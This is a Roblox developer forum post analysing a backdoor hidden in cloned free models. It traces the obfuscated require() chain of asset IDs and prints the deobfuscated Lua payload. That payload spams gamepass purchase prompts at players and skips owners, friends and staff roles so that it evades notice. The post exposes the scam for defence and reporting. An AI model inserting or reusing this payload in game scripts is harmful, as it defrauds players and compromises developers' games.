How usually backdoors work? [Explanation]

Resources Community Tutorials
, ,
#1

Viruses / backdoors

I think you’ve already heard about some cloned plugins / free models
and you are maybe already know about the viruses and backdoors

the most basic ones dont even care about nor hiding the scripts nor hiding the creators
but there’s more dangerous type that hard to detect
it’s still a virus but it’s hidden in the depth of the script somewhere with ~200 spaces and this
image

that is the image of one of the victims of that kind of virus

let’s look how it works inside

  • first this getfenv() thing just means require if you run the code

so what are we interested in is following the id (5758303792)
usually it’s the chain of ids

something like

  • 5758303792 - another id - another id - another id - … real script

that means they just make it hard to find
each script in chain just requires the other
image

at the end one user helped me with that and found the final id

  • 9704956167

Instruction

btw small instruction how to get the module by id
you just go to the creator store and paste the id
https://create.roblox.com/store/asset/[ID HERE]

you getting on the page and just downloading the file
Page:

image
image1340×576 55.7 KB

Download button:
image

and you can drop it in the place

Uncovering creator

Back to uncovering the truth :slight_smile:

you will get the script that looks like that
image

MainModule:

image
image1417×404 42.2 KB

the structure looks like that

  1. long ofuscated code (“the long part my guess is just decrypting the obfuscated code and the short part is the real code”)
  2. custom lua loadstring

what we are searching is in the main module and luckily we dont have to search for long in that case
because the owner gave it to us at the start :slight_smile: image

as we follow that, we will get to the main script
then again it is the same layout
image

looks the same right?
but the things will get way easier from now on

MainModule:

image
image791×293 37.8 KB

now finally we can read something!
the script just combines the descriptions of 2 gamepasses and executes them in the parser

we can simply run the checks and look what the actual code looks like

spawn(function() 
	local Players,	MarketService,	GamepassIds,	Time,	GameCreatorType,	GameCreatorId = game:GetService("Players"), game:GetService("MarketplaceService"), 
	{107584795, 107584737}, "############### ##### #################", game.CreatorType, game.CreatorId
	function ShouldWePrompt(plr)
		if GameCreatorType == Enum.CreatorType.User then 
			if plr:IsFriendsWith(GameCreatorId) or plr.UserId == GameCreatorId then
				return false 
			end 
		elseif GameCreatorType == Enum.CreatorType.Group then
			local Role = plr:GetRoleInGroup(GameCreatorId)
			local role = tostring(Role):lower() 
			if role:find("admin") or 
				role:find("owner") or 
				role:find("chairman") or 
				role:find("dev") or
				role:find("creator") or 
				role:find("vice") or 
				role:find("alt") or 
				role:find("barista") or 
				role:find("senior") or 
				role:find("mod") or 
				role:find("staff") or 
				role:find("assistant") or 
				role:find("trainee") or 
				role:find("ally") or 
				role:find("allied") or
				role:find("allies") or
				role:find("manag") or 
				role:find("contrib") or
				role:find("officer") or 
				role:find("hold") or 
				role:find("partner") or
				role:find("manage") or 
				role:find("intern") or 
				role:find("supervis") or 
				role:find("coord") or 
				role:find("exec") or 
				role:find("cook") or
				role:find("chef") or
				role:find("cashier") or
				role:find("shift") or
				role:find("lead") or 
				role:find("pres") or
				plr:GetRankInGroup(GameCreatorId) > 200 then 
				return 
					false
			end
		end
		return 
			true 
	end 
	function Prompt(plr)
		spawn(function()
			for i = 1, 10 do 
				for i,v in pairs(GamepassIds) do
					if not MarketService:UserOwnsGamePassAsync(plr.UserId,v) then
						MarketService:PromptGamePassPurchase(plr,v)
						if plr.MembershipType == Enum.MembershipType.Premium then
							wait(Time/2) 
						else wait(Time) 
						end 
					end 
				end
			end 
		end) 
	end 
	Players.PlayerAdded:Connect(function(Player)
		if ShouldWePrompt(Player) then
			Prompt(Player)
		end 
	end)
	for i,Player in pairs(Players:GetPlayers()) do
		if ShouldWePrompt(Player) then if ######################################################### then 
			else Prompt(Player)
			end 
		end 
	end 
end)

and quickly analizing the code you can see that it spams 2 gamepasses

explanation of following code
when player joins, it spams with 2 gamepasses
but before that it checks if the game was created under the group or by the player

Group

  • if you are the owner
  • if by the group it checks whether you have a specific text in your group role
  • if the role value is higher than 200
  • if you are friends with the owner

Player

  • if you are the owner
  • if you are friends with the owner

and then prompts the gamepasses if all of the above if false

Discovery

The creator used a lot of alts to publish the scripts / passes
And the group who owns these gamepasses is Million Dollar Circle - Roblox

Thanks for the attention!
Hopefully roblox moderation can make investigation on that one!

Have you uncovered some of the virus creators?
If yes can you share your own story?

13 Likes